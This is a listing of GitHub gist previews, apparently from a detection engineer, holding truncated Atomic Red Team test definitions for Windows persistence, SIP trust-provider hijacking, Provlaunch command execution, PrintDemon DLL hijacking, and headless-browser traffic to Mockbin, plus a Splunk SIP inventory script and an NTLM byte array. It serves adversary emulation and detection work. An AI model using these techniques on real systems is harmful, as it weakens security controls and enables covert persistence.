
@MHaggis
MHaggis / HoneyMimiclite.py
Created October 31, 2023 18:12
You'll probably need to change line 6 or make a logs dir.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from datetime import datetime
import logging

# One log file per run, named by start time; the logs/ directory must already exist
current_datetime = datetime.now().strftime('%Y%m%d_%H%M%S')
log_file_name = f'logs/app_{current_datetime}.log'


class EmulatedServer(BaseHTTPRequestHandler):
    pass
```
@MHaggis
MHaggis / T1547.yaml
Created October 18, 2023 15:23
Atomic Red Team
```yaml
- name: 'HKCU - Add Registry Key Under CurrentVersion\Windows'
  description: |
    This test attempts to add a registry entry under HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
    which points to a potential payload "calc.exe". This can be indicative of an attacker trying to achieve persistence or other malicious objectives.
    References:
    - https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/
    - https://persistence-info.github.io/Data/windowsload.html
  supported_platforms:
  - windows
  input_arguments:
```
```yaml
attack_technique: T1553.003
display_name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
atomic_tests:
- name: SIP (Subject Interface Package) Hijacking via Custom DLL
  auto_generated_guid: e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675
  description: |
    Registers a DLL that logs signature checks, mimicking SIP hijacking. This test uses a DLL from
    https://github.com/gtworek/PSBits/tree/master/SIP and registers it using regsvr32, thereby causing
    the system to utilize it during signature checks, and logging said checks.
  supported_platforms:
```
@MHaggis
MHaggis / SIP_inputs.md
Created October 10, 2023 19:47
Inventory SIP

Place in inputs.conf and watch the SIP roll in.

```ini
# Modify for your environment. Make sure the sourcetype matches the analytic as needed.
[powershell://SubjectInterfacePackage]
script = $registryPaths = @("HKLM:\SOFTWARE\Microsoft\Cryptography\Providers","HKLM:\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0","HKLM:\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1","HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers","HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0","HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1"); $registryPaths | ForEach-Object {Get-ChildItem -Recurse $_ | ForEach-Object {$key=$_; $props=$key.GetValueNames(); $propDataPairs=@{}; for ($i=0; $i -lt $props.Length; $i++) {$propDataPairs[$props[$i]]=$key.GetValue($props[$i])}; $outputObj=[PSCustomObject]@{Path=$key.PSPath;PSChildName=$key.PSChildName}; $propDataPairs.GetEnumerator() | ForEach-Object {Add-Member -InputObject $outputObj -NotePropertyName $_.Name -NotePropertyValue $_.Val
```
```yaml
- name: Provlaunch.exe Executes Arbitrary Command via Registry Key
  description: |
    Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command.
    - https://twitter.com/0gtweet/status/1674399582162153472
    - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
    Registry keys are deleted after successful execution.
  supported_platforms:
  - windows
  executor:
    command: |
```
@MHaggis
MHaggis / T1574.001.yaml
Created September 20, 2023 14:40
#AtomicWednesdays T1574.001 - PrintDemon
```yaml
- name: PrintDemon
  description: |
    Atomic Test to emulate PrintDemon.
    [Reference](https://github.com/BC-SECURITY/Invoke-PrintDemon)
    Also seen on TryHackMe - https://tryhackme.com/room/dllhijacking
  supported_platforms:
  - windows
  input_arguments:
    dll_path:
      description: File path for ualapi.dll
```
@MHaggis
MHaggis / T1564.003.yaml
Created September 13, 2023 15:46
Mockbin Atomic Test with Headless browsing
```yaml
- name: Headless Browser Accessing Mockbin
  description: |
    The following Atomic Red Team test leverages the Chrome headless browser to access a mockbin site. Create your own Mockbin.org site and replace the BIN in the inputs.
  supported_platforms:
  - windows
  input_arguments:
    bin_id:
      description: Mockbin.org BIN ID
      type: string
      default: f6b9a876-a826-4ac0-83b8-639d6ad516ec
```
```python
import requests
import os
import json

# Input file of bin IDs, the Mockbin endpoint, and output directories for logs and generated scripts
file_path = "ids.txt"
base_url = "https://mockbin.org/bin"
log_directory = "logs"
script_directory = "scripts"

# Create the log directory if it is missing (the gist preview is cut off at this point)
if not os.path.exists(log_directory):
    os.makedirs(log_directory)
```

Original sending to Mockbin (use a new mockbin)

```powershell
[byte[]]$NTLMType2 =
@(
    0x4e,0x54,0x4c,0x4d,
    0x53,0x53,0x50,0x00,
    0x02,0x00,0x00,0x00,
    0x00,0x00,0x00,0x00,
    0x00,0x28,0x00,0x00,
```
@MHaggis
MHaggis / T1112.yaml
Created September 6, 2023 03:08
Atomic Red Team Test - https://twitter.com/M_haggis/status/1699056847154725107?s=20. Grab one, submit a PR! Be quick, whoever submits first gets a shirt + sticker :)
```yaml
- name: Modify Internet Zone Protocol Defaults in Current User Registry - cmd
  description: |
    This test simulates an adversary modifying the Internet Zone Protocol Defaults in the registry of the currently logged-in user using the reg.exe utility via the command prompt. Such modifications can be indicative of an adversary trying to weaken browser security settings. Upon execution, if successful, the message "The operation completed successfully." will be displayed.
    To verify the effects of the test:
    1. Open the Registry Editor (regedit.exe).
    2. Navigate to "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults".
    3. Check for the presence of the "http" and "https" DWORD values set to `0`.
    Or run:
```